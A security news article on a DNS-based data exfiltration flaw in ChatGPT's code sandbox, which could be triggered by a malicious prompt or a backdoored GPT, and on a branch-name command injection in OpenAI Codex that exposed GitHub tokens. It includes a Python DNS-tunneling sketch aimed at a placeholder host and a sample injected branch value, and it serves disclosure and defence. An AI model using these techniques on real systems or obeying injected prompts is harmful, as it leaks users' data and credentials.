A previously unknown vulnerability in OpenAI ChatGPT allowed sensitive conversation data to be exfiltrated without user knowledge or consent, according to new findings from Check Point.
"A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content," the cybersecurity company said in a report published today. "A backdoored GPT could abuse the same weakness to obtain access to user data without the user's awareness or consent."
Following responsible disclosure, OpenAI addressed the issue on February 20, 2026. There is no evidence that the issue was ever exploited in a malicious context.
While ChatGPT is built with various guardrails to prevent unauthorized data sharing and block direct outbound network requests, the newly discovered vulnerability bypasses these safeguards entirely by exploiting a side channel originating from the Linux runtime the artificial intelligence (AI) agent uses for code execution and data analysis.
Specifically, it abuses DNS as a "covert transport mechanism," encoding information into DNS requests to sidestep the visible AI guardrails. What's more, the same hidden communication path could be used to establish remote shell access inside the Linux runtime and achieve command execution.
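To make the mechanism concrete, the sketch below shows how data can be smuggled through DNS lookups even when HTTP egress is blocked. This is an illustrative reconstruction, not Check Point's actual proof of concept: the domain name is a placeholder, and the encoding scheme (base32 chunked into DNS labels) is a common choice for DNS tunneling, assumed here for demonstration.

```python
import base64

# Placeholder domain for illustration only; an attacker would control the
# authoritative nameserver for this zone and log every incoming query.
ATTACKER_DOMAIN = "exfil.example.com"

def encode_for_dns(secret: bytes, domain: str = ATTACKER_DOMAIN) -> list[str]:
    """Return hostnames that smuggle `secret` out via ordinary DNS lookups."""
    # Base32 survives DNS's case-insensitive, limited character set.
    payload = base64.b32encode(secret).decode().rstrip("=")
    # Chunk small enough that "<seq>-<chunk>" stays within the 63-byte
    # maximum length of a single DNS label (RFC 1035).
    labels = [payload[i:i + 60] for i in range(0, len(payload), 60)]
    return [f"{seq}-{chunk}.{domain}" for seq, chunk in enumerate(labels)]

hostnames = encode_for_dns(b"api_key=sk-secret-123")
for name in hostnames:
    # Resolving each name (e.g. via socket.getaddrinfo) sends the encoded
    # chunk to the attacker's nameserver, even inside a "no egress" sandbox.
    print(name)
```

The key point is that no HTTP request ever occurs: the sandbox's own resolver carries the data out, which is why egress filters focused on web traffic miss it.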
Because no warning or user approval dialog is ever shown, the vulnerability creates a security blind spot: the AI system assumes the environment is isolated.
As an illustrative example, an attacker could convince a user to paste a malicious prompt by passing it off as a way to unlock premium capabilities for free or improve ChatGPT's performance. The threat is magnified when the technique is embedded inside custom GPTs, as the malicious logic can be baked into the GPT itself rather than relying on tricking a user into pasting a specially crafted prompt.
"Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation," Check Point explained. "As a result, the leakage did not trigger warnings about data leaving the conversation, did not require explicit user confirmation, and remained largely invisible from the user's perspective."
With tools like ChatGPT increasingly embedded in enterprise environments and users uploading highly personal information, vulnerabilities like these underscore the need for organizations to implement their own security layer to counter prompt injections and other unexpected behavior in AI systems.
"This research reinforces a hard truth for the AI era: don't assume AI tools are secure by default," Eli Smadja, head of research at Check Point Research, said in a statement shared with The Hacker News.
"As AI platforms evolve into full computing environments handling our most sensitive data, native security controls are no longer sufficient on their own. Organizations need independent visibility and layered protection between themselves and AI vendors. That's how we move forward safely -- by rethinking security architecture for AI, not reacting to the next incident."
The development comes as threat actors have been observed publishing web browser extensions (or updating existing ones) that engage in the dubious practice of prompt poaching to silently siphon AI chatbot conversations without user consent, highlighting how seemingly harmless add-ons could become a channel for data exfiltration.
"It almost goes without saying that these plugins open the doors to several risks, including identity theft, targeted phishing campaigns, and sensitive data being put up for sale on underground forums," Expel researcher Ben Nahorney said. "In the case of organizations where employees may have unwittingly installed these extensions, they may have exposed intellectual property, customer data, or other confidential information."
Command Injection Vulnerability in OpenAI Codex Leads to GitHub Token Compromise
The findings also coincide with the discovery of a critical command injection vulnerability in OpenAI's Codex, a cloud-based software engineering agent, that could have been exploited to steal GitHub credential data and ultimately compromise multiple users interacting with a shared repository.
"The vulnerability exists within the task creation HTTP request, which allows an attacker to smuggle arbitrary commands through the GitHub branch name parameter," BeyondTrust Phantom Labs researcher Tyler Jespersen said in a report shared with The Hacker News. "This can result in the theft of a victim's GitHub User Access Token – the same token Codex uses to authenticate with GitHub."
The issue, per BeyondTrust, stems from improper input sanitization when processing GitHub branch names during task execution on the cloud. As a result, an attacker could inject arbitrary commands through the branch name parameter in an HTTPS POST request to the backend Codex API, execute malicious payloads inside the agent's container, and retrieve sensitive authentication tokens.
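The class of bug described here is straightforward to reproduce in miniature. The sketch below is a hypothetical reconstruction, not Codex's actual code: it assumes the agent interpolated a client-supplied branch name into a shell command, and shows the standard mitigations of allowlist validation plus argument-list execution.

```python
import re
import subprocess

# Attacker-controlled parameter, as it might arrive in the task-creation
# request. The ';' terminates the intended command if a shell parses it.
branch = "main; echo pwned > /tmp/proof"

# Vulnerable pattern (illustrative): the shell interprets metacharacters.
unsafe_cmd = f"git checkout {branch}"
# subprocess.run(unsafe_cmd, shell=True)   # would execute the injected command

# Mitigation 1: validate against a conservative allowlist of ref characters
# before the name touches any command.
SAFE_REF = re.compile(r"^[A-Za-z0-9._/-]+$")

def is_safe_branch(name: str) -> bool:
    return bool(SAFE_REF.match(name)) and ".." not in name

# Mitigation 2: pass arguments as a list so no shell ever parses them,
# and use "--" so the name cannot be mistaken for an option.
def checkout(name: str) -> None:
    if not is_safe_branch(name):
        raise ValueError(f"rejected branch name: {name!r}")
    subprocess.run(["git", "checkout", "--", name], check=True)

print(is_safe_branch("feature/fix-123"))  # True
print(is_safe_branch(branch))             # False: ';' and space rejected
```

Either mitigation alone narrows the attack surface; combining them means a malformed name is rejected outright and, even if validation were bypassed, the shell never gets a chance to interpret it.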
"This granted lateral movement and read/write access to a victim's entire codebase," Kinnaird McQuade, chief security architect at BeyondTrust, said in a post on X. OpenAI patched the vulnerability on February 5, 2026, after it was reported on December 16, 2025. The flaw affects the ChatGPT website, the Codex CLI, the Codex SDK, and the Codex IDE Extension.
The cybersecurity vendor said the branch command injection technique could also be extended to steal GitHub installation access tokens and execute bash commands on the code review container whenever @codex is referenced on GitHub.
"With the malicious branch set up, we referenced Codex in a comment on a pull request (PR)," it explained. "Codex then initiated a code review container and created a task against our repository and branch, executing our payload and forwarding the response to our external server."
The research also highlights a growing risk where the privileged access granted to AI coding agents can be weaponized to provide a "scalable attack path" into enterprise systems without triggering traditional security controls.
"As AI agents become more deeply integrated into developer workflows, the security of the containers they run in – and the input they consume – must be treated with the same rigor as any other application security boundary," BeyondTrust said. "The attack surface is expanding, and the security of these environments needs to keep pace."